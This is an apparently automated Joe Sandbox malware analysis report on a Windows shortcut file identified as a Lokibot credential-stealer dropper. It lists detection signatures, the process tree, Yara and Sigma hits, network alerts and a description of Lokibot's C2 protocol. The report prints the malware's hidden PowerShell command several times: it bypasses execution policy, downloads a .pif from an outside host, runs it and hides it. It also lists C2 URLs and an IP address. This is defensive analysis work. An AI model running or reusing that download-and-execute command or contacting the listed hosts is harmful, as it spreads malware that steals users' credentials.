Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Comprobante.lnk.lnk

Overview

General Information

Sample name:Comprobante.lnk.lnk
Analysis ID:1524797
MD5:8c19af87f9129a49e35158f93815eb7f
SHA1:9a6c4b22c2e5bf7f039eb2ad20d0822c0e913d14
SHA256:245f1f3463841248c78c4917dc1a846419f92d957132fabf0b4ee4501dcb6198
Tags:lnkuser-abuse_ch
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Lokibot
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Drops PE files with a suspicious file extension
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows shortcut file (LNK) contains suspicious command line arguments
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden'; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • screens.pif (PID: 2208 cmdline: "C:\Users\user\Desktop\screens.pif" MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
      • screens.pif (PID: 688 cmdline: C:\Users\user\Desktop\screens.pif MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
      • screens.pif (PID: 5852 cmdline: C:\Users\user\Desktop\screens.pif MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
        • WerFault.exe (PID: 5632 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5852 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • screens.pif (PID: 6092 cmdline: C:\Users\user\Desktop\screens.pif MD5: DB94D5DF4ADD0A06F261EAE73C2DA5DB)
        • WerFault.exe (PID: 6184 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6092 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000005.00000002.2659632439.00000000013D8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000004.00000002.1509596429.0000000002F17000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x191cc:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 36 entries
            SourceRuleDescriptionAuthorStrings
            4.2.screens.pif.49889b8.2.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              4.2.screens.pif.49889b8.2.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              4.2.screens.pif.49889b8.2.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              4.2.screens.pif.49889b8.2.unpackLoki_1Loki Payloadkevoreilly
              • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x133fc:$a2: last_compatible_version
              4.2.screens.pif.49889b8.2.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x123ff:$des3: 68 03 66 00 00
              • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 24 entries
              SourceRuleDescriptionAuthorStrings
              amsi64_7360.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\user\Desktop\screens.pif" , CommandLine: "C:\Users\user\Desktop\screens.pif" , CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\screens.pif, NewProcessName: C:\Users\user\Desktop\screens.pif, OriginalFileName: C:\Users\user\Desktop\screens.pif, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7360, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Users\user\Desktop\screens.pif" , ProcessId: 2208, ProcessName: screens.pif
                Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRShElL.exe" -ExecutionPolicy Bypass -WindowStyle hiDDEn -HiDdEn -Command ddisplay.dll;(new-object System.Net.WebClient).DownloadFile('https://www.sodiumlaurethsulfatedesyroyer.com/flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif','screens.pif');./'screens.pif';(get-item 'screens.pif').Attributes += 'Hidden';, ProcessId: 7360, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:20:47.526720+020020243121A Network Trojan was detected192.168.2.104970745.149.241.16980TCP
                2024-10-03T09:20:48.453317+020020243121A Network Trojan was detected192.168.2.104970845.149.241.16980TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-03T09:20:46.743247+020020253811Malware Command and Control Activity Detected192.168.2.104970745.149.241.16980TCP
                2024-10-03T09:20:47.692236+020020253811Malware Command and Control Activity Detected192.168.2.104970845.149.241.16980TCP
                2024-10-03T09:20:48.567976+020020253811Malware Command and Control Activity Detected192.168.2.104970945.149.241.16980TCP
                2024-10-03T09:20:56.608552+020020253811Malware Command and Control Activity Detected192.168.2.104971545.149.241.16980TCP
                2024-10-03T09:20:58.316279+020020253811Malware Command and Control Activity Detected192.168.2.104971645.149.241.16980TCP
                2024-10-03T09:20:59.297568+020020253811Malware Command and Control Activity Detected192.168.2.104971745.149.241.16980TCP
                2024-10-03T09:21:00.494707+020020253811Malware Command and Control Activity Detected192.168.2.104971845.149.241.16980TCP
                2024-10-03T09:21:01.777716+020020253811Malware Command and Control Activity Detected192.168.2.104971945.149.241.16980TCP
                2024-10-03T09:21:03.684048+020020253811Malware Command and Control Activity Detected192.168.2.104972045.149.241.16980TCP
                2024-10-03T09:21:04.600648+020020253811Malware Command and Control Activity Detected192.168.2.104972145.149.241.16980TCP
                2024-10-03T09:21:05.528198+020020253811Malware Command and Control Activity Detected192.168.2.104972245.149.241.16980TCP
                2024-10-03T09:21:06.423848+020020253811Malware Command and Control Activity Detected192.168.2.104972345.149.241.16980TCP
                2024-10-03T09:21:07.339146+020020253811Malware Command and Control Activity Detected192.168.2.104972445.149.241.16980TCP
                2024-10-03T09:21:08.254833+020020253811Malware Command and Control Activity Detected192.168.2.104972545.149.241.16980TCP
                2024-10-03T09:21:09.163793+020020253811Malware Command and Control Activity Detected192.168.2.104972645.149.241.16980TCP
                2024-10-03T09:21:10.038728+020020253811Malware Command and Control Activity Detected192.168.2.104972745.149.241.16980TCP
                2024-10-03T09:21:11.038525+020020253811Malware Command and Control Activity Detected192.168.2.104972845.149.241.16980TCP
                2024-10-03T09:21:12.097651+020020253811Malware Command and Control Activity Detected192.168.2.104972945.149.241.16980TCP
                2024-10-03T09:21:13.053982+020020253811Malware Command and Control Activity Detected192.168.2.104973045.149.241.16980TCP
                2024-10-03T09:21:13.963379+020020253811Malware Command and Control Activity Detected192.168.2.104973145.149.241.16980TCP
                2024-10-03T09:21:14.812196+020020253811Malware Command and Control Activity Detected192.168.2.104973245.149.241.16980TCP
                2024-10-03T09:21:15.631002+020020253811Malware Command and Control Activity Detected192.168.2.104973345.149.241.16980TCP
                2024-10-03T09:21:17.618667+020020253811Malware Command and Control Activity Detected192.168.2.104973445.149.241.16980TCP
                2024-10-03T09:21:18.848565+020020253811Malware Command and Control Activity Detected192.168.2.104973545.149.241.16980TCP
                2024-10-03T09:21:20.073300+020020253811Malware Command and Control Activity Detected192.168.2.104973645.149.241.16980TCP
                2024-10-03T09:21:20.894549+020020253811Malware Command and Control Activity Detected192.168.2.104973745.149.241.16980TCP
                2024-10-03T09:21:21.709486+020020253811Malware Command and Control Activity Detected192.168.2.104973845.149.241.16980TCP
                2024-10-03T09:21:22.731827+020020253811Malware Command and Control Activity Detected192.168.2.104973945.149.241.16980TCP
                2024-10-03T09:21:23.541526+020020253811Malware Command and Control Activity Detected192.168.2.104974045.149.241.16980TCP
                2024-10-03T09:21:24.429751+020020253811Malware Command and Control Activity Detected192.168.2.104974145.149.241.16980TCP
                2024-10-03T09:21:25.256730+020020253811Malware Command and Control Activity Detected192.168.2.104974245.149.241.16980TCP
                2024-10-03T09:21:26.118736+020020253811Malware Command and Control Activity Detected192.168.2.104974345.149.241.16980TCP
                2024-10-03T09:21:26.897709+020020253811Malware Command and Control Activity Detected192.168.2.104974445.149.241.16980TCP
                2024-10-03T09:21:27.873598+020020253811Malware Command and Control Activity Detected192.168.2.104974545.149.241.16980TCP
                2024-10-03T09:21:28.712017+020020253811Malware Command and Control Activity Detected192.168.2.104974645.149.241.16980TCP
                2024-10-03T09:21:29.654591+020020253811Malware Command and Control Activity Detected192.168.2.104974745.149.241.16980TCP
                2024-10-03T09:21:30.592777+020020253811Malware Command and Control Activity Detected192.168.2.104974945.149.241.16980TCP
                2024-10-03T09:21:32.603612+020020253811Malware Command and Control Activity Detected192.168.2.104975045.149.241.16980TCP
                2024-10-03T09:21:33.526238+020020253811Malware Command and Control Activity Detected192.168.2.104975145.149.241.16980TCP
                2024-10-03T09:21:35.225314+020020253811Malware Command and Control Activity Detected192.168.2.104975245.149.241.16980TCP
                2024-10-03T09:21:37.121380+020020253811Malware Command and Control Activity Detected192.168.2.104975345.149.241.16980TCP
                2024-10-03T09:21:42.317761+020020253811Malware Command and Control Activity Detected192.168.2.104975445.149.241.16980TCP
                2024-10-03T09:21:43.182438+020020253811Malware Command and Control Activity Detected192.168.2.104975545.149.241.16980TCP
                2024-10-03T09:21:44.019040+020020253811Malware Command and Control Activity Detected192.168.2.104975645.149.241.16980TCP
                2024-10-03T09:21:44.999700+020020253811Malware Command and Control Activity Detected192.168.2.104975745.149.241.16980TCP
                2024-10-03T09:21:45.841003+020020253811Malware Command and Control Activity Detected192.168.2.104975845.149.241.16980TCP
                2024-10-03T09:21:46.640569+020020253811Malware Command and Control Activity Detected192.168.2.104975945.149.241.16980TCP
                2024-10-03T09:21:47.539146+020020253811Malware Command and Control Activity Detected192.168.2.104976045.149.241.16980TCP
                2024-10-03T09:21:48.485570+020020253811Malware Command and Control Activity Detected192.168.2.104976145.149.241.16980TCP
                2024-10-03T09:21:50.351787+020020253811Malware Command and Control Activity Detected192.168.2.104976245.149.241.16980TCP
                2024-10-03T09:21:51.167462+020020253811Malware Command and Control Activity Detected192.168.2.104976345.149.241.16980TCP
                2024-10-03T09:21:52.087418+020020253811Malware Command and Control Activity Detected192.168.2.104976445.149.241.16980TCP
                2024-10-03T09:21:52.996562+020020253811Malware Command and Control Activity Detected192.168.2.104976545.149.241.16980TCP
                2024-10-03T09:21:54.039701+020020253811Malware Command and Control Activity Detected192.168.2.104976645.149.241.16980TCP
